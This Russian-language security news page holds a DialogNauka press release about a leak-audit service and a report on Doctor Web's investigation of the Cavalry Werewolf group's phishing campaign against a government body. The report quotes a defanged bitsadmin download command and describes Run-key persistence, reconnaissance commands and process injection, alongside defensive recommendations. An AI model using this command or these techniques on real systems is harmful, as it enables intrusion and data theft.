Новая услуга «ДиалогНауки»: аудит утечек конфиденциальной информации на основе технологий конкурентной разведки

Новая услуга «ДиалогНауки»: аудит утечек конфиденциальной информации на основе технологий конкурентной разведки

Компания «ДиалогНаука», предлагает новую услугу по аудиту наличия конфиденциальной информации в сети Интернет. Услуга представляет собой независимый и документированный процесс поиска и анализа конфиденциальных сведений в Интернете при помощи средств конкурентной разведки.

Актуальность услуги вызвана тем, что она позволяет компаниям среднего и крупного бизнеса своевременно выявлять и устранять последствия действий злоумышленников, связанных с утечкой конфиденциальной информации.

Любая организация рано или поздно сталкивается с растущим объемом конфиденциальной информации, которой со временем становится сложно управлять. Увеличение числа пользователей приводит к распределению данных по предприятию, а также усложнению механизмов контроля доступа. В такой ситуации существенно возрастает вероятность утечки конфиденциальной информации, в том числе и через общедоступную сеть Интернет.

Новая услуга «ДиалогНауки» рассчитана на компании среднего и крупного бизнеса, которые хотели бы выявить наличие конфиденциальных или компрометирующих сведений о каких-то событиях, организациях, персонах, продуктах, технологиях, а так же установить авторство таких сообщений в сети Интернет. Аудит выполняется группой экспертов-аналитиков «ДиалогНауки», компетенция, численность и состав которой зависят от целей обследования и сложности анализа.

В общем случае аудит наличия конфиденциальной информации в Интернете средствами конкурентной разведки состоит из следующих этапов: подписание соглашения о неразглашении, разработка регламента проведения работ, сбор данных в сети Интернет, структурирование информации и подготовка отчёта. На последнем этапе специалисты компании «ДиалогНаука» формулируют рекомендации по устранению найденной конфиденциальной информации в Интернете и предотвращению подобных утечек в будущем.

«Периодически из российских и западных СМИ мы узнаем о фактах утечки конфиденциальных данных, которые влекут за собой не только потерю столь дорогостоящей репутации, но и наносят прямой финансовый ущерб. При этом, как показывает наш опыт, конфиденциальная информация часто содержится в открытом доступе на сайтах самих компаний, которые об этом ничего не подозревают, – отмечает Виктор Сердюк, генеральный директор компании «ДиалогНаука». – Для обнаружения фактов утечек конфиденциальной информации в сети Интернет мы разработали новую услугу по соответствующему виду аудита. Уверен, что аудит утечек конфиденциальной информации в сети Интернет, использующий технологии конкурентной разведки, будет особо интересен заказчикам из банковской, страховой и топливно-энергетической отрасли. Как показывает опыт, именно эти организации проявляют повышенный интерес к защите репутации и нуждаются в особом контроле наличия конфиденциальной информации в сети Интернет».

«В настоящее время в сети Интернет существует большое количество ресурсов, которые могут использоваться злоумышленниками для передачи конфиденциальной информации за пределы корпоративной сети. Корпоративные сайты, файлообменные сервера, профессиональные сообщества, социальные сети — все эти и множество других мест являются возможными каналами утечки конфиденциальной информации, — говорит Андрей Масалович, руководитель направления конкурентной разведки компании «ДиалогНаука». — При этом компании должны иметь возможность проведения оценки эффективности существующих средств защиты от утечек. Именно для решения данной задачи «ДиалогНаука» предлагает свою услугу по аудиту утечек конфиденциальной информации в сети Интернет, которая уже прекрасно зарекомендовала себя в нашей консалтинговой практике».

Подробную информацию об услуге аудита утечек конфиденциальной информации в сети Интернет, которая использует технологии конкурентной разведки, можно получить на сайте компании «ДиалогНаука» по адресу http://www.DialogNauka.ru/main.phtml?/services/conf-info.

ИНФОРМАЦИЯ О КОМПАНИИ «ДИАЛОГНАУКА»
С момента образования в 1992 г. «ДиалогНаука» является одной из ведущих российских компаний, специализирующихся в области информационной безопасности. Первыми и самыми известными отечественными продуктами, поставляемыми компанией, были антивирусы Doctor Web, Aidstest и ревизор ADinf.
Сегодня «ДиалогНаука» оказывает также услуги в области системной интеграции, консалтинга и внедрения комплексных решений по защите информации. Компания занимает лидирующие позиции в сфере дистрибьюции программных продуктов для защиты от вирусов, спама, сетевых атак и других угроз информационной безопасности.
«ДиалогНаука» является поставщиком программных решений от ряда ведущих российских и зарубежных компаний рынка информационной безопасности – «Доктор Веб», «Инфотекс», «Яндекс», Acronis, Agnitum, Aladdin, Cisco Systems, Microsoft, SmartLine, Sophos, StarForce Technologies, Symantec, Trend Micro, Websense и других. Постоянно растущая партнерская сеть «ДиалогНауки» охватывает свыше 100 городов России и насчитывает более 400 компаний-партнеров.
«ДиалогНаука» является членом Ассоциации защиты информации (АЗИ), Ассоциации документальной электросвязи (АДЭ), Сообщества ABISS, а также Ассоциации «СИРИУС». Компания является сертифицированным партнером BSI Management Systems.
Свою деятельность компания «ДиалогНаука» осуществляет на основании лицензий Федеральной службы по техническому и экспортному контролю (ФСТЭК) и Федеральной службы безопасности (ФСБ).
Программами и услугами от «ДиалогНауки» пользуются сотни тысяч индивидуальных и тысячи корпоративных пользователей в России и других странах. В их числе крупные компании и влиятельные государственные структуры.
Дополнительную информацию о компании можно найти на сайте www.DialogNauka.ru.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

Группировка Cavalry Werewolf взломала сеть госоргана с помощью бэкдоров

В июле 2025 года к специалистам компании «Доктор Веб» обратился клиент из госсектора с жалобой на рассылку подозрительных писем с корпоративного почтового ящика. Расследование показало: перед ними была целевая кампания кибергруппировки, которую аналитики идентифицировали как Cavalry Werewolf.

Цель атаки — сбор конфиденциальной информации и картирование сети для дальнейшего закрепления внутри инфраструктуры.

Начали злоумышленники банально, но эффективно — с фишинга. В качестве «приманки» приходили архивы с паролем и вложенным бэкдором BackDoor.ShellNET.1 (основан на открытом проекте Reverse-Shell-CS). Файлы маскировались под служебные записки и другие официальные документы — имена были соответствующие, чтобы снизить бдительность получателя.

 

После запуска BackDoor.ShellNET.1 атакующие использовали стандартный для Windows инструмент bitsadmin для скачивания дополнительных полезных нагрузок (пример: bitsadmin /transfer www /download hxxp://…/winpot.exe). Среди загруженных модулей оказался стилер Trojan.FileSpyNET.5, который массово тянул документы (.doc/.docx/.xlsx/.pdf), текстовые файлы и изображения. Для скрытого доступа применяли BackDoor.Tunnel.41 (вариант ReverseSocks5) — с его помощью создавались SOCKS5-туннели и обеспечивалось скрытое подключение к заражённому ПК.

Дальше — больше: специалисты «Доктор Веб» обнаружили целый набор инструментов, как собственных, так и основанных на open-source. В арсенале группировки — скриптовые загрузчики (например, BAT.DownLoader.1138), «упакованные» трояны (Trojan.Packed2.49708, Trojan.Siggen31.54011 и т. п.), бэкдоры, управляемые через телеграм-ботов (BackDoor.Siggen2.5463, BackDoor.ShellNET.2), а также прокси-модули типа BackDoor.ReverseProxy.1. Некоторые варианты внедряли полезную нагрузку в легитимные процессы — например, инжектировали данные в aspnet_compiler.exe, чтобы бэкдор выполнялся в контексте доверенного приложения.

 

Интересно, что злоумышленники активно пользуются открытими решениями: либо берут код «как есть», либо модифицируют его под свои нужды. Для доставки следующей волны вредоносов они используют стандартные утилиты — PowerShell, bitsadmin, curl — а для сохранения присутствия в системе модифицируют автозагрузку через реестр (HKCU\...\Run) или ставят исполняемые файлы в C:\users\public\pictures и похожие публичные папки.

Атака Cavalry Werewolf показала типичную для целевых кампаний логику: разведка (whoami, ipconfig, просмотр директорий), проверка прокси и сети, затем загрузка инструментов и закрепление. Также злоумышленники могли позже использовать скомпрометированные устройства для перехода в другие сети — например, при смене работы жертвы — и разворачивать дальнейшие атаки через доверенные каналы.

Отдельные особенности группировки, которые отмечают аналитики «Доктор Веб»: предпочтение к open-source-инструментам, частое использование обратных шеллов и SOCKS-туннелей, внедрение вреда в видимо «безобидные» программы и управление через Telegram API. Фишинговые рассылки имитируют сообщения от государственных органов — это снижает подозрительность целевой аудитории и повышает шансы успешной компрометации.

Рекомендации для организаций — стандартный, но действенный набор мер: усилить фильтрацию почты и блокировку подозрительных вложений, ограничить возможность запуска bitsadmin/PowerShell неподписанных скриптов, включить контроль исполнения (application control) и EDR, регулярно проверять целевые публичные папки, применять многофакторную аутентификацию и оперативно реагировать на подозрительные соединения с неизвестными C2-адресами. При обнаружении инцидента — немедленно изолировать пострадавшие хосты и провести полноценную форензику, чтобы выявить степень компрометации.

Расследование «Доктор Веб» — ещё одно напоминание: даже крупные организации с государственным уровнем защиты уязвимы к грамотному фишингу и тому, что за ним следует. В современных целевых атаках именно сочетание человеческой ошибки и хорошо отлаженных инструментов злоумышленников делает наибольший ущерб.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru